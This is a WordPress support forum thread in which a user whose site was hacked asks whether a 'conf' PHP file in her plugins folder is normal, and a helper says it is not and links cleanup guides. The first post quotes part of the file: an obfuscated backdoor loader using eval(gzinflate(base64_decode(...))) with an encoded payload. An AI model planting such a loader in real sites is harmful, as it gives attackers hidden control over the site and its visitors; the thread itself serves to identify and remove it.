Title: conf PHP in PLugins folder – Is it normal?
Last modified: August 19, 2016

---

# conf PHP in PLugins folder – Is it normal?

 *  [allysonashley](https://wordpress.org/support/users/allysonashley/)
 * (@allysonashley)
 * [15 years, 11 months ago](https://wordpress.org/support/topic/conf-php-in-plugins-folder-is-it-normal/)
 * Hi all!
 * My site was recently hacked due to an out of date version of wordpress. I isolated
   some yucky code in the footer- deleted all my files, and have switched hosts.
   I am working to re implement thematic using my wp-content folder, but I want 
   to make sure that I get all the bugs out before doing so. Everything looks normal
   with the bad footer code removed, except the PHP file : “conf” in my Plugins 
   folder.
 * Here’s a sample :”<?PHP
    set_time_limit(0); $login = “”; $pass = “”; $md5_pass
   = “”; eval(gzinflate(base64_decode(‘HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/
   yqceii7e8n9JvOYE9t8sT8cs//cfWUXldLpKsQ2LCH7EcnuYdrqeqDHEDz+4uJYWH3YLflGUnDJ40DjU/
   AL1miwEJPpBWlsAxTrgB46jRW/00XpggW00yDI/H1kD7UqxI/3qjQZ4vz7HLsfNVW1BeQKiVH2VTrXtoiaKYdkT4o/
   p1E8W/n5eVhagV7GanBn0U7OCfD7zPbCQyO0N/QGtstthqJBia5QJsR6xCgkHpBo1kQMlLt6u++SBvtw5KSMwtG4R2yctd0mBNrlB3QQo4aQKGRgRjTa0xYFw1vVM9ySOMd44sSrPeSG8JPyOyEpK
   +U0y8d4n2EzI9MDdnlMkLKQQ8ZIYPW3sF4lUFF9gO8AjT5ceta4HM7HkZi7S2yoAAPLD8D7Pn4kD6t1EIkHYORMtJBdqcseuvOO5HcoLJO4b5UENDkOEq25EeU3GFSPIGFBzJVwCzJ”
 * Is this normal, or is this bad/fake code also?
 * I’m very much NOT fluent in code, so any help would be greatly appreciated!

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [15 years, 11 months ago](https://wordpress.org/support/topic/conf-php-in-plugins-folder-is-it-normal/#post-1574413)
 * It is most definitely **not** normal. See the following links for cleaning up
   your site after a hack:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/](http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/)
 *  Thread Starter [allysonashley](https://wordpress.org/support/users/allysonashley/)
 * (@allysonashley)
 * [15 years, 11 months ago](https://wordpress.org/support/topic/conf-php-in-plugins-folder-is-it-normal/#post-1574419)
 * Okay, thank you! I was suspecting it to be a little weird! Should there even 
   be a file called “conf” ?
 * I’ll take a looksy at the rest of the steps.
 * Much appreciated!
 *  [esmi](https://wordpress.org/support/users/esmi/)
 * (@esmi)
 * [15 years, 11 months ago](https://wordpress.org/support/topic/conf-php-in-plugins-folder-is-it-normal/#post-1574507)
 * > Should there even be a file called “conf” ?
 * No – especially not if it’s in the plugin’s folder itself (as opposed to being
   in the folder for a specific plugin. The last 2 links that I gave specifically
   look at cleaning up these kinds of pseudo files.

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘conf PHP in PLugins folder – Is it normal?’ is closed to new replies.

## Tags

 * [conf](https://wordpress.org/support/topic-tag/conf/)
 * [php](https://wordpress.org/support/topic-tag/php/)

 * 3 replies
 * 2 participants
 * Last reply from: [esmi](https://wordpress.org/support/users/esmi/)
 * Last activity: [15 years, 11 months ago](https://wordpress.org/support/topic/conf-php-in-plugins-folder-is-it-normal/#post-1574507)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics